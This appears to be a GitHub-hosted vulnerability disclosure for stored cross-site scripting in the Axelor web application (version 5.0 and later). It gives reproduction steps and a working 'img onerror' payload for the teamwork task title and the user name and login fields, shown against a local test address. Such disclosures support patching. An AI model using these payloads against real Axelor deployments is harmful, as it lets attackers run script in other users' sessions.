Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Axelor_Stored_XSS

Stored_XSS_axelor_WebApp

Product : AXELOR

Version : > / = 5.0

Vulnerable parameters = *

Exemple :

Section "teamwork"
Add new task and put the payload in the title.

PARAM : name
payload : <img/src/onerror=prompt(666)>
URL : http://192.168.0.30:8080/#/ds/team.tasks.assigned/list/1

Other one :

Section Administration / User Management / Users

URL : http://192.168.0.30:8080/#/ds/action-auth-users/edit/4

Register an new user with the parameters as follow : 
	name = <img/src/onerror=prompt(666)>
	login ("code" parameter in the request) = <img/src/onerror=prompt(666)>

Get XSSED When visiting the Users view : http://192.168.0.30:8080/#/ds/action-auth-users/list/1

Payload for demonstration use :

<img/src/onerror=prompt(1)>